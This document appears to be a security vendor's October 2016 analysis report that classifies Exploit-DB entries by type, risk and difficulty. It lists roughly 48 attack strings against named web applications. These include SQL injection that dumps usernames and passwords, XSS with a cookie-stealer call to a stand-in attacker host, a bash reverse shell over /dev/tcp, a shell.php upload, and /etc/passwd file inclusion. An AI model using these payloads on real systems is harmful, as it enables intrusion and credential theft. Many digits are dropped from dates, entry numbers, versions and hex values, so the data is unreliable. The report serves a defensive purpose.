EDB Analysis Report (2016.10) 2016.10.01~2016.10.31
Vulnerabilities published on Exploit-DB (http://exploit-db.com), classified by type.

Summary of analysis (Author: Penta Security Systems, Security Assessment Team)

Analysis of the Exploit-DB entries published in October 2016 shows that SQL Injection had the largest number of reports, and that a wide variety of attack types were found. Even when a SQL Injection attack starts out as a low-difficulty one, once the vulnerability is found it can be abused to mount many further attacks, so it belongs to the class of very high-risk attacks. To avoid exposure to SQL Injection, secure coding that enforces strict input validation is essential. Looking at the breakdown by software, vulnerabilities were found in October in a wide range of software, CMSs included. Administrators who run software in which a vulnerability was found should check the details of that vulnerability and apply the relevant updates so that they are not exposed to it.

1. Reports by vulnerability type

   Vulnerability type         Reports
   Remote Command Execution   1
   File Upload                1
   LFI                        2
   XSS                        21
   SQL Injection              23
   Total                      48

2. Classification by risk

   Risk     Reports   Percentage
   High     5         10.42%
   Medium   43        89.58%
   Total    48        100.00%

3. Breakdown by attack difficulty

   Difficulty   Reports   Percentage
   High         4         8.33%
   Medium       9         18.75%
   Low          35        72.92%
   Total        48        100.00%

4. Breakdown by major software (48 reports in total)

   Q3V: 4 reports
   Other affected software: Image, Business, Rental, Dynamic Web, Picosafe, Entrepreneur Job Portal, Thatware, Event Calendar, Press Release, Fashion, School Full CBT, FreePBX, Application, Health Record, Witbe, Ap MicroBlog, Categorizator, JonhCMS, Rental, Ap MicroCMS, S9Y Serendipity, CNDSOFT, Learning Management, Forum, XhP CMS, Student Information, Advance MLM, Web Based Alumni Tracking System, OpenCimetiere, Colorful Blog, BB Portal, miniblog, MLM Unilevel Plan
Detail table. Columns: Date, EDB number, Type, Attack difficulty, Attack risk, Name, Key attack code, Target program / Target environment. Values are given as printed in the report.

EDB 40454 | Date 06-0-05 | XSS | Difficulty: Medium | Risk: Medium
  Name: Picosafe Web Gui - filemanager.php XSS
  Target: Picosafe Web Gui / Picosafe
  Attack code: /picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=phnjcmlwdd5hbgvydcgxkts8l3njcmlwdD4=

EDB 40468 | Date 06-0-06 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: BB Portal - viewproduct.php SQL Injection
  Target: BB Portal / BB Portal
  Attack code: /advancedbb/viewproduct.php?pid=94%7%0and%0754=754%0AND%0%7whqn%7=%7whqn

EDB 40467 | Date 06-0-06 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Rental - Blind SQL Injection
  Target: Rental / Rental
  Attack code: /product_details.php?refid=395887%7%0and%039=39%0AND%0%7HTMi%7=%7HTMi

EDB 40466 | Date 06-0-06 | SQL Injection | Difficulty: Medium | Risk: Medium
  Name: Advance MLM - SQL Injection
  Target: Advance MLM / Advance MLM
  Attack code: /mlm/news_detail.php?newid=jmctrq%7%0union%0ALL%0SELECT%0NULL,CONCAT(0x7787a7a7,0x48755657878776796667664866474474844b655564f54370537747504c6e73687666550,0x7787877),NULL,NULL,NULL,NULL--%0Afye

EDB 40470 | Date 06-0-06 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Clone - restaurants-details.php SQL Injection
  Target: Clone / Clone
  Attack code: /jus/restaurants-details.php?fid=%0and%0=--

EDB 40469 | Date 06-0-06 | SQL Injection | Difficulty: High | Risk: High
  Name: MLM Unilevel Plan v.0. - news_detail.php SQL Injection
  Target: MLM Unilevel Plan / MLM Unilevel Plan v.0.
  Attack code: /news_detail.php?newid=%7%0%f*%30000and%0ascii%8substring%8%8database%8%9%9%C4%C%9%9%3C5%0and*%F%0%7x%7%3D%7x

EDB 4046 | Date 06-0-06 | Remote Command Execution | Difficulty: Medium | Risk: High
  Name: Witbe - Remote Code Execution
  Target: Witbe / Witbe
  Attack code: POST /cgi-bin/applyconfig.pl HTTP/. with body: file=set bash -i >& /dev/tcp/ 0>&

EDB 40470 | Date 06-0-06 | XSS | Difficulty: Low | Risk: Medium
  Name: Clone - restaurants-details.php XSS
  Target: Clone / Clone
  Attack code: /jus/restaurants-details.php?fid=<script>alert();</script>

EDB 40479 | Date 06-0-07 | SQL Injection | Difficulty: High | Risk: High
  Name: Entrepreneur Job Portal - jobsearch_all.html SQL Injection
  Target: Entrepreneur Job Portal / Entrepreneur Job Portal
  Attack code: /job-portal/jobsearch_all.html?cmpid=345355536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x76a7a7a7,(SELECT (ELT(8347=8347,))),0x77876b7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjf'='tqjf

EDB 40480 | Date 06-0-09 | XSS | Difficulty: Medium | Risk: Medium
  Name: miniblog.0. - admin.php XSS
  Target: miniblog / miniblog.0.
  Attack code: POST /miniblog/adm/admin.php?mode=add&id=%3cbr%0/%3E%3Cb%3ENotice%3C/b%3E:%0%0Undefined%0variable:%0post%0in%0%3cb%3ec:\\\\xampp\\\\htdocs\\\\miniblog\\\\adm\\\\edit.php%3c/b%3e%0on%0line%0%3cb%3e8%3c/b%3E%3Cbr%0/%3E HTTP/. with body: data[post_title]=<script>location.href = “http://www.attackersite.com/stealer.php?cookie=” + document.cookie;</script>

EDB 40487 | Date 06-0-09 | XSS | Difficulty: Low | Risk: Medium
  Name: Press Release - administration.php XSS
  Target: Press Release / Press Release
  Attack code: /phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('exploit-DB')<%Fscript>&summary=deneme&releasebody=deneme&categorynewedit=&publish=active

EDB 40505 | Date 06-0- | XSS | Difficulty: Low | Risk: Medium
  Name: Ap MicroBlog.0. - index.php XSS
  Target: Ap MicroBlog / Ap MicroBlog.0.
  Attack code: POST /index.php?page=posts&post_id= HTTP/. with body: task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=besim&captcha_code=dkf8&btnsubmitpc=publish your comment

EDB 4053 | Date 06-0- | SQL Injection | Difficulty: Low | Risk: Medium
  Name: OpenCimetiere v3.0.0-a5 - login.php SQL Injection
  Target: OpenCimetiere / OpenCimetiere v3.0.0-a5
  Attack code: POST / HTTP/. with body: login.action.connect=se%0connecter&came_from=&login=%0and%0=--&password=passw0rd

EDB 4056 | Date 06-0- | XSS | Difficulty: Low | Risk: Medium
  Name: Ap MicroCMS 3.9.5 - index.php XSS
  Target: Ap MicroCMS / Ap MicroCMS 3.9.5
  Attack code: POST /index.php?page=posts&post_id= HTTP/. with body: comment_user_name=<svg/onload=prompt(7);//>

EDB 405 | Date 06-0- | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Categorizator 0.3. - vote.php SQL Injection
  Target: Categorizator / Categorizator 0.3.
  Attack code: /cms/categorizator/vote.php?id_site='%0and%0''=' '

EDB 4056 | Date 06-0-3 | XSS | Difficulty: Low | Risk: Medium
  Name: Colorful Blog - single.php XSS
  Target: Colorful Blog / Colorful Blog
  Attack code: POST /single.php?kat=kat&url='post_name' HTTP/. with body: adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=nice, blog post

EDB 4059 | Date 06-0-3 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: .0 - admin.php SQL Injection
  Target: .0 / .0
  Attack code: /blog/admin.php?act=editpost&id='+order+by+999--+

EDB 4058 | Date 06-0-3 | XSS | Difficulty: Low | Risk: Medium
  Name: .0 - Multiple Vulnerabilities
  Target: .0 / .0
  Attack code: POST /blog/admin.php HTTP/. with body: act=addpost&publish_date=06-0-3 0:30:7&post_title=<script>alert('XssPoC')</script>&post_text=hacked&post_limit=550

EDB 40530 | Date 06-0-3 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: JonhCMS 4.5. - go.php SQL Injection
  Target: JonhCMS / JonhCMS 4.5.
  Attack code: /go.php?id=%0and%0=--

EDB 405 | Date 06-0-3 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Thatware 0.4.6 - friend.php SQL Injection
  Target: Thatware / Thatware 0.4.6
  Attack code: /friend.php?sid=%0and%0=--

EDB 4053 | Date 06-0-4 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Forum.4 - admin.php SQL Injection
  Target: Forum / Forum.4
  Attack code: /admin.php?act=editpost&id='+order+by+999--+

EDB 40547 | Date 06-0-4 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Health Record 0. - signin.php SQL Injection
  Target: Health Record / Health Record 0.
  Attack code: POST /signin.php HTTP/. with body: lgaid=admin' or ''='

EDB 40546 | Date 06-0-4 | SQL Injection | Difficulty: Medium | Risk: Medium
  Name: Fashion 0. - dd.php SQL Injection
  Target: Fashion / Fashion 0.
  Attack code: /admin/dd.php?q=-%7%0union%0select%0,version()--+

EDB 40545 | Date 06-0-4 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Learning Management 0. - login.php SQL Injection
  Target: Learning Management / Learning Management 0.
  Attack code: POST /admin/login.php HTTP/. with body: username=admin' or ''='

EDB 40544 | Date 06-0-4 | SQL Injection | Difficulty: Medium | Risk: Medium
  Name: Dynamic Web 0. - page.php SQL Injection
  Target: Dynamic Web / Dynamic Web 0.
  Attack code: /page.php?prodid=-3%7%0union%0select%0,,@@version,4--+

EDB 40543 | Date 06-0-4 | SQL Injection | Difficulty: Medium | Risk: Medium
  Name: Web Based Alumni Tracking 0. - print_employed.php SQL Injection
  Target: Web Based Alumni Tracking / Web Based Alumni Tracking 0.
  Attack code: /admin/print_employed.php?id=-%7%0union%0select%0,concat(username,0x3a,password),3,4,5,6,7,8,9,0,,%0from%0user--+

EDB 4054 | Date 06-0-4 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Student Information (SIS) 0. - admin_login.php SQL Injection
  Target: Student Information / Student Information (SIS) 0.
  Attack code: POST /admin_login.php HTTP/. with body: username=admin' or ''='

EDB 4055 | Date 06-0-6 | XSS | Difficulty: Low | Risk: Medium
  Name: - index.php XSS
  Target: -
  Attack code: /index.php?key=<svg/onload=alert()>

EDB 4055 | Date 06-0-6 | XSS | Difficulty: Low | Risk: Medium
  Name: - administration.php XSS
  Target: -
  Attack code: /administration.php?key=<svg/onload=alert()>

EDB 40559 | Date 06-0-7 | XSS | Difficulty: Low | Risk: Medium
  Name: Business - index.php XSS
  Target: Business / Business
  Attack code: /index.php?key=<svg/onload=alert()>&location=<svg/onload=alert()>

EDB 40558 | Date 06-0-7 | SQL Injection | Difficulty: Medium | Risk: Medium
  Name: School Full CBT 0. - show.php SQL Injection
  Target: School Full CBT / School Full CBT 0.
  Attack code: /show.php?show=-%0union%0select%0,username,password,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,user(),database(),3,3%0from%0adminlogin--+

EDB 40555 | Date 06-0-7 | SQL Injection | Difficulty: High | Risk: High
  Name: Application 0. - productdetails.php SQL Injection
  Target: Application / Application 0.
  Attack code: /shop/product-details.php?prodid=-80%7%0union%0select%0,,concat(username,0x3a,password),4,version(),user()%0from%0user--+

EDB 40554 | Date 06-0-7 | XSS | Difficulty: Low | Risk: Medium
  Name: Image - index.php XSS
  Target: Image / Image
  Attack code: /index.php?dateyear=<svg/onload=alert()>&key=<svg/onload=alert()>

EDB 40554 | Date 06-0-7 | XSS | Difficulty: Low | Risk: Medium
  Name: Image - administration.php XSS
  Target: Image / Image
  Attack code: /administration.php?dateyear=<svg/onload=alert()>&key=<svg/onload=alert()>

EDB 40559 | Date 06-0-7 | XSS | Difficulty: Low | Risk: Medium
  Name: Business - administration.php XSS
  Target: Business / Business
  Attack code: /administration.php?key=<svg/onload=alert()>&location=<svg/onload=alert()>

EDB 40576 | Date 06-0-9 | XSS | Difficulty: Medium | Risk: Medium
  Name: XhP CMS 0.5. - action.php XSS
  Target: XhP CMS / XhP CMS 0.5.
  Attack code: POST /action.php?module=users&action=process_general_config&box_id=9&page_id=0&basename=index.php&closewindow=&from_page=page=0&box_id=9&action=display_site_settings&errcode=0 HTTP/. with body: frmpagetitle="accesskeyzonclick"alert&#40;document.domain

EDB 40575 | Date 06-0-9 | File Upload | Difficulty: Low | Risk: Medium
  Name: CNDSOFT.3 - index.php File Upload
  Target: CNDSOFT / CNDSOFT.3
  Attack code: POST /ofis/index.php?is=kullanici_tanimla HTTP/. (Content-Type: multipart/form-data; boundary=-----------------------------7dd009908f) with a part Content-Disposition: form-data; name="file"; filename="shell.php", Content-Type: application/octet-stream, whose content is: <? phpinfo();?>

EDB 40594 | Date 06-0-0 | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Event Calendar.5 - admin.php SQL Injection
  Target: Event Calendar / Event Calendar.5
  Attack code: /admin.php?act=options&cal_id='+order+by+0--+

EDB 4059 | Date 06-0-0 | SQL Injection | Difficulty: High | Risk: High
  Name: Rental - viewproducts.php SQL Injection
  Target: Rental / Rental
  Attack code: /viewproducts.php?catid=-9700%7%0OR%0%0GROUP%0BY%0CONCAT(0x77a6707,(SELECT%0(CASE%0WHEN%0(7055=7055)%0THEN%0%0ELSE%00%0END)),0x76a76787,FLOOR(RAND(0)*))%0HAVING%0MIN(0)#

EDB 406 | Date 06-0- | SQL Injection | Difficulty: Low | Risk: Medium
  Name: Clone - categoryview-list.php SQL Injection Vulnerability
  Target: Clone / Clone
  Attack code: /category-view-list.php?srch=%0and%0=--

EDB 4064 | Date 06-0- | LFI | Difficulty: Low | Risk: Medium
  Name: FreePBX 0.3.66 - ajax.php LFI
  Target: FreePBX / FreePBX 0.3.66
  Attack code: POST /admin/ajax.php HTTP/. with body: destination=/../../../../../../var/www/html/0x448.php&language=

EDB 4060 | Date 06-0-3 | XSS | Difficulty: Low | Risk: Medium
  Name: 07 - form_process.php XSS
  Target: 07 / 07
  Attack code: POST /zenbership/pp-functions/form_process.php HTTP/. with body: page=&session=zen_076e737b450bbd83f5fc066&first_name=besim&last_name=<>alert('exploitdb')</script>&email=exploit@yopmail.com

EDB 4060 | Date 06-0-3 | XSS | Difficulty: Low | Risk: Medium
  Name: 07 - event-add.php XSS
  Target: 07 / 07
  Attack code: POST /admin/cp-functions/event-add.php HTTP/. with body: event[name]=<>alert('meryem-exploitdb');</>

EDB 4064 | Date 06-0-8 | XSS | Difficulty: Low | Risk: Medium
  Name: Q3V - FWUpgrade.php XSS
  Target: Q3V / Q3V
  Attack code: POST /FWUpgrade.php HTTP/. (Content-Type: multipart/form-data; boundary=-----------------------------7dd009908f) with a part Content-Disposition: form-data; name="file"; filename="somefile.php<img src=x onerror=confirm()>", Content-Type: text/php, whose content is: t00t

EDB 4064 | Date 06-0-8 | XSS | Difficulty: Low | Risk: Medium
  Name: Q3V - SensorDetails.php XSS
  Target: Q3V / Q3V
  Attack code: /SensorDetails.php?Menu=SST&DeviceID=C00"><script>alert()</script>

EDB 4064 | Date 06-0-8 | XSS | Difficulty: Low | Risk: Medium
  Name: Q3V - SNMP.php XSS
  Target: Q3V / Q3V
  Attack code: POST /SNMP.php?Menu=SMP HTTP/. with body: SNMPAgent=Enable&CommuintyString=public&Commuintywrite=private&trapsversion=vtrap&ip=9.68.0.54';alert(3)

EDB 4064 | Date 06-0-8 | LFI | Difficulty: Low | Risk: Medium
  Name: Q3V - ListFile.php LFI
  Target: Q3V / Q3V
  Attack code: /ListFile.php?file=../../../../../../../etc/passwd

EDB 40650 | Date 06-0-3 | XSS | Difficulty: Low | Risk: Medium
  Name: S9Y Serendipity.0.4 - serendipity_admin.php XSS Vulnerability
  Target: S9Y Serendipity / S9Y Serendipity.0.4
  Attack code: POST /serendipity_admin.php HTTP/. with body: serendipity[body]=<>alert('meryem ExploitDB')</>